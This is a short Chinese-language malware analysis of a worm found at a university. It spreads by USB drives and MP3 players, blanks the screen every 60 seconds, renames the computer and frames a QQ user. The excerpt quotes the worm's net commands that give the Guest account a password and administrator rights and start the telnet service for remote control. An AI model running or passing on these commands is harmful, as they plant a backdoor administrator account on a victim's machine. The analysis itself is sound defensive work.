二、 病毒描述:
该病毒发现于****大学内,利用U盘、MP3等移动设备进行传播。病毒内含QQ65409685、llm is my son等信息,病毒在%system32%下生成fuck you.txt 的文本文档,内容为:Powered by LLM, QQ:65409685。经推断病毒作者并非QQ号为65409658的使用者,而是一种嫁祸行为。病毒运行后每隔60秒会黑屏一秒,黑屏是专门设计的窗体,黑屏时不能进行输入输出的操作等,并且在重启机后也会有黑屏现象。该病毒提升用户Guest权限为管理员级,并设置密码,启动telnet服务,可以远程控制用户计算机,但由于病毒作者设计上的漏洞,如果telnet服务本身被禁止的话是启动不了telnet服务的,并且需要NtLmSsp服务的支持。修改计算机系统名为:QQ65409685。病毒复制自身到多个目录下,在注册表中添加了三处启动项,但由于格式错误,只有run键下的可以随机启动。在windows XP系统下,重新启动后无法使用鼠标双击和右键打开"本地磁盘"。
5、提升用户Guest权限为管理员级,并设置密码,启动telnet服务:
net user guest llmismyson
net user guest /active:yes
net localgroup administrators guest /add
net localgroup guests guest /del
net start telnet /y
